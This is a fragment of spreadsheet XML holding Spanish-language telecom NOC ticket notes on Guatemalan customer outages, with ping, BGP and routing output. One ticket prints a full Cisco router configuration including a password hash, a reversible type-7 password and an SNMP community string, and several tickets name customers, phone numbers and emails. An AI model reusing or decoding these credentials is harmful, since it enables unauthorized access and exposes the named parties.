    <t>SE LLAMO A CAM CONTESTO JEFFERSON INDICA QUE REALIZO COMUNICACION CON LA TIENDA Y LE INDICARON QUE ES POR TEMAS DE MANTENIMIENTOS EN EL AREA DE EQUIPOS QUE HAN ESTADO DESCONECTANDO LOS EQUIPOS DEL UPS, NO TIENEN FECHA ESTIMADA CUANDO CULMINAN LOS MANTENIMIENTOS EN PUNTO REMOTO. PERSONAL DE CAM AVERIGUARA DETALLE DE CUANDO CULMINANRAN MANTENIMIENTOS SE LLAMARA EL DÍA DE MAÑANA.
2001360670
COLA:
NOMBRE: A: 22437253
NÚMERO: 22437253
DURACIÓN: 0:04:09
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22437253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 26/06/2022 11:40:05</t>
  </si>
  <si>
    <t>SE VALIDA ESTABILIDAD DEL CPE NO SE HA REINCIDO DESDE || SE PROCEDE AL CIERRE DEL TICKET
NODE STATUS 	REACHABLE
SYSTEM NAME 	CC_WALMART_UTILITARIOS_GT_84.CLARO.COM.GT
IP ADDRESS 	10.212.203.169
COUNTRY 	GUATEMALA
PROPERTY 	CUSTOMER
GROUP 	CC_WALMART_VIP
CUSTOMER 	OPMANTEK
LOCATION 	GUATEMALA
BUSINESS SERVICE 	EMAIL
SERVICE STATUS 	DEVELOPMENT
TYPE 	ROUTER
MODEL 	CISCOROUTER
UPTIME 	3 DAYS, 9:21:47</t>
  </si>
  <si>
    <t>SE VALIDA CON PERSONAL DEL CAM, ATIENDE GERALD TORRES, SE LE INFORMA QUE EQUIPO CISCO ES REINCIDENTE POR REINICIOS CONSTANTES EN LO QUE VA DEL MES, SE SOLICITA APOYO PARA VALIDAR SI UPS ESTA EN BUEN ESTADO, YA QUE INFORMA QUE SI TIENEN UPS EN LA TIENDA, POR LO QUE INDICA ESTARA COORDINANDO PERSONAL INTERNO PARA VERIFICAR ESTADO DE UPS .
ID
2001320865
COLA:
NOMBRE: A: 22437253
NÚMERO: 22437253
DURACIÓN: 0:02:30
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22437253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 25/06/2022 18:44:44</t>
  </si>
  <si>
    <t>F4617025</t>
  </si>
  <si>
    <t>SERVICIO OPERATIVO NO SE OBSERVA RECONVERGENCIA NI CAIDAS EN EL SERVICIO SE OBSERVA ESTABLE Y SIN PERDIDAS NI LATENCIAS SE PORCEDERA A VALIDAR CON EL CLIENTE
&lt;PPANPAC0N2T1A01A01EID1&gt; DISPLAY BGP VPNV4 VPN-INSTANCE SCOTIA_INT PEER | IN 10.17.127.125
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE SCOTIA_INT, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 1                 PEERS IN ESTABLISHED STATE : 1
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.17.127.125                    4       65503   778702   974989     0 2058H47M ESTABLISHED       20
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -C 1000 -S 1500 -B -M 50  -VPN-INSTANCE SCOTIA_INT 10.17.127.125
  PING 10.17.127.125: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.17.127.125 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/8 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;
PE  10.179.38.7
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY IP ROUTING-TABLE VPN-INSTANCE SCOTIA_INT 10.17.127.125
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIA_INT
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.17.127.124/30  DIRECT  0    0             D   10.17.127.126   GIGABITETHERNET1/0/10.1032
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTER  GIGABITETHERNET1/0/10.1032
#
INTERFACE GIGABITETHERNET1/0/10.1032
 VLAN-TYPE DOT1Q 1032
 DESCRIPTION ROUTER_SCOTIA-INT_PA
 IP BINDING VPN-INSTANCE SCOTIA_INT
 IP ADDRESS 10.17.127.126 255.255.255.252
 STATISTIC ENABLE
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_200MBPS INBOUND IDENTIFIER NONE
 QOS-PROFILE TRAFSHAP_200MBPS_PB_22 OUTBOUND IDENTIFIER NONE
#
RETURN</t>
  </si>
  <si>
    <t>F4617066</t>
  </si>
  <si>
    <t>ELENLACE SE ENCUENTRA CAIDO A NIVEL WAN NOSE ALCANZA EL CPE DEL CLIENTE SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE POR ENERGIA COMERCIAL.
&lt;CHMLGTCMN1T2C06B02EIM1&gt;PIN -VPN-INSTANCE TRANSFERENCIAS 10.103.19.40             PING 10.103.19.40: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.103.19.40 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;CHMLGTCMN1T2C06B02EIM1&gt;
PE  10.179.28.31
&lt;CHMLGTCMN1T2C06B02EIM1&gt;DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.103.19.40
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.103.19.0/25  DIRECT  0    0             D   10.103.19.1     VLANIF10
&lt;CHMLGTCMN1T2C06B02EIM1&gt;DIS IP ROUTI
&lt;CHMLGTCMN1T2C06B02EIM1&gt;DIS CUR INTER VLANIF10
#
INTERFACE VLANIF10
 DESCRIPTION TRANSFERENCIAS ENLACE PRINCIPAL
 SET FLOW-STAT INTERVAL 30
 IP BINDING VPN-INSTANCE TRANSFERENCIAS
 IP ADDRESS 10.103.19.1 255.255.255.128
 IP ADDRESS 10.72.117.1 255.255.255.248 SUB
 IP ADDRESS 10.72.117.81 255.255.255.240 SUB
 IP ADDRESS 10.72.150.1 255.255.255.240 SUB
 IP ADDRESS 10.72.151.177 255.255.255.248 SUB
 IP ADDRESS 10.72.158.97 255.255.255.248 SUB
 IP ADDRESS 10.78.117.81 255.255.255.240 SUB
 IP ADDRESS 10.87.188.193 255.255.255.240 SUB
 ARP EXPIRE-TIME 300
 UNDO ICMP NAME NET-UNREACHABLE SEND
 UNDO ICMP NAME HOST-UNREACHABLE RECEIVE
 UNDO ICMP NAME PROTOCOL-UNREACHABLE RECEIVE
 UNDO ICMP NAME PORT-UNREACHABLE SEND
 OSPF TIMER HELLO 1
 OSPF ENABLE 12 AREA 0.0.1.101
#
RETURN</t>
  </si>
  <si>
    <t>F4617190</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE ALARMA DE ENERGIA SE PROCEDE CON EL CIERRE DEL TICKET POR PROBLEMAS DE ENERGIA COMERCIAL.
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 5 MINUTOS)
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 19-MAR-14 11:56 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_GMG_GT_INTERNET_POPTUN UPTIME IS 5 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.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17823Z
6 GIGABIT ETHERNET INTERFACES
3 TERMINAL LINES
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
2 CELLULAR INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1921/K9          FTX1817823Z
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      SECURITYK9    PERMANENT      SECURITYK9
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_GMG_GT_INTERNET_POPTUN#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2384 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_GMG_GT_INTERNET_POPTUN
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$87WJ$V/N53RPACTMITMHFJUOVL/
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX1817823Z
!
!
USERNAME GESTIONIP PASSWORD 7 011D23534C5B140465
!
REDUNDANCY
!
!
!
!
!
CONTROLLER CELLULAR 0/1
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.159.7 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/313900299T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.174.142.82 255.255.255.240
 IP VIRTUAL-REASSEMBLY IN
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 216.230.140.85 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/0/0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/2
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/3
 NO IP ADDRESS
!
INTERFACE CELLULAR0/1/0
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
INTERFACE CELLULAR0/1/1
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
INTERFACE VLAN1
 NO IP ADDRESS
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.174.142.81
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_5 CALLE Y 6 AVENIDA ESQUINA ZONA 1 POTUN PETEN
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
!
CONTROL-PLANE
!
!
!
LINE CON 0
 LOGIN LOCAL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE 0/1/0 0/1/1
 NO EXEC
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_GMG_GT_INTERNET_POPTUN#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 28 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 28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8192 BYTES):
*JAN  2 00:00:03.119: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JAN  2 00:00:03.315: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = SECURITYK9 AND LICENSE = SECURITYK9
*JUN 26 05:02:38.131: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN 26 05:03:06.215: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
*JUN 26 05:03:06.219: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
*JUN 26 05:03:07.171: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 26 05:03:07.171: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 26 05:03:07.999: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN 26 05:03:08.171: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 26 05:03:08.171: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 26 05:03:12.279: %CELLWAN-2-SIM_FAILURE: [CELLULAR0/1/0]: SIM READ FAILED
*JUN 26 05:03:12.351: %CELLWAN-2-MODEM_UP: MODEM IN HWIC SLOT 0/1 IS NOW UP
*JUN 26 05:03:12.359: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*JUN 25 23:03:14.935 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 05:03:14 UTC SUN JUN 26 2022 TO 23:03:14 GUA SAT JUN 25 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*JUN 25 23:03:15.075 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN 25 23:03:15.995 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN 25 23:03:16.963 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 25 23:03:18.011 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN 25 23:03:18.175 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN 25 23:03:18.175 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 25 23:03:18.175 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO DOWN
*JUN 25 23:03:18.175 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO DOWN
*JUN 25 23:03:19.347 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 19-MAR-14 11:56 BY PROD_REL_TEAM
*JUN 25 23:03:19.395 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_GMG_GT_INTERNET_POPTUN IS UNDERGOING A COLD START
*JUN 25 23:03:20.031 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*JUN 25 23:03:20.031 GUA: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
*JUN 25 23:03:20.031 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*JUN 25 23:03:20.031 GUA: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
CC_GMG_GT_INTERNET_POPTUN#
SHOW CLOCK
*23:08:21.895 GUA SAT JUN 25 2022
CC_GMG_GT_INTERNET_POPTUN#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.142.81           0   084F.0AC8.68CD  ARPA   GIGABITETHERNET0/0
INTERNET  10.174.142.82           -   D072.DC2B.BC20  ARPA   GIGABITETHERNET0/0
INTERNET  216.230.140.85          -   D072.DC2B.BC21  ARPA   GIGABITETHERNET0/1
INTERNET  216.230.140.86          0   0C8D.DBAF.F2DD  ARPA   GIGABITETHERNET0/1
CC_GMG_GT_INTERNET_POPTUN#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/313900299T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
GI0/0/0                        DOWN           DOWN
GI0/0/1                        DOWN           DOWN
GI0/0/2                        DOWN           DOWN
GI0/0/3                        DOWN           DOWN
CE0/1/0                        DOWN           DOWN
CE0/1/1                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            DOWN           DOWN
CC_GMG_GT_INTERNET_POPTUN#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.174.142.82   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         216.230.140.85  YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  DOWN                  DOWN
CELLULAR0/1/0              UNASSIGNED      YES UNSET  DOWN                  DOWN
CELLULAR0/1/1              UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.159.7    YES NVRAM  UP                    UP
VLAN1                      UNASSIGNED      YES UNSET  DOWN                  DOWN
CC_GMG_GT_INTERNET_POPTUN#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.174.142.82
  PING 10.174.142.82: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.142.82 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/17 MS
RUTA IP:
PE: 10.179.28.71
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.142.82
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.142.82/32  DIRECT  0    0                 0.0.0.0         VLANIF2205			</t>
  </si>
  <si>
    <t>F4617222</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE OPERATIVO POR PARTE DE CLARO SE PROCEDE CON CIERRE POR PARTE DE CLARO NO SE TIENE GESTION DEL CPE SE PORCEDE CON CIERRE POR ENERGIA COMERCIAL
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALMART_INTERNET 10.174.227.157
  PING 10.174.227.157: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.227.157 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.27
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALMART_INTERNET 10.174.227.157
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALMART_INTERNET
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.174.227.157/32  DIRECT  0    0                 0.0.0.0         VLANIF789			</t>
  </si>
  <si>
    <t>F4617228</t>
  </si>
  <si>
    <t>ENLACE CAIDO SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE POR ENERGIA COMERCIAL
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN INTERNET_GT_DEPTA 10.87.116.100
  PING 10.87.116.100: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.116.100 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.28
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTA 10.87.116.100</t>
  </si>
  <si>
    <t>F4617230</t>
  </si>
  <si>
    <t xml:space="preserve">SE PROCEDE A DEJAR ENE ETAPA PENDIENTE CLIENTE POR ENERGIA COMERCIAL
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN INTERNET_GT_METRO 10.174.141.117
  PING 10.174.141.117: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.141.117 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.14
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.174.141.117
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.174.141.112/29  DIRECT  0    0             D   10.174.141.113  VLANIF2205			</t>
  </si>
  <si>
    <t>F4617333</t>
  </si>
  <si>
    <t>SELLAMA A CLIENTE WALTER REYES MENCIONA QUE YA NO OBSERVA NINGUN PROBLEMA CON EL SERVICIO
CLIENTE CONFIRMA EL FUNCIONANDO
-ID 2001575313</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER RESYES 45787911 MENCIONA QUE YA NO OBSERVA PROLEMA CON EL SERVICIO PERO SOLICITA LLAMADA PARA LAS 15:00 HRS
-ID 2001517902</t>
  </si>
  <si>
    <t>F4617336</t>
  </si>
  <si>
    <t>--- SE RECIBE CORREO DEL CLIENTE, SE RESPONDE. ...
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO EL: DOMINGO, 26 DE JUNIO DE 2022 08:04
PARA: MARIO MUTZ &lt;MARIO.ML@ALLIEDGLOBAL.COM&gt;
CC: NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; NOC ALLIED GLOBAL &lt;NOC@ALLIEDGLOBAL.COM&gt;; NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; DAVID MARROQUIN &lt;DAVID.M@ALLIEDGLOBAL.COM&gt;; MANUEL BERGES &lt;MANUEL.B@ALLIEDGLOBAL.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: REVISIÓN CON SERVICIO ID 412500001 INTERNET PACIFIC 06/26/2022
MARIO.
                CNOC INDICA QUE EL SERVICIO POR PARTE DE CLARO SE ENCUENTRA DE MANERA CORRECTA.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
ATENTAMENTE:
DE: MARIO MUTZ [MAILTO:MARIO.ML@ALLIEDGLOBAL.COM]
ENVIADO EL: DOMINGO, 26 DE JUNIO DE 2022 07:58
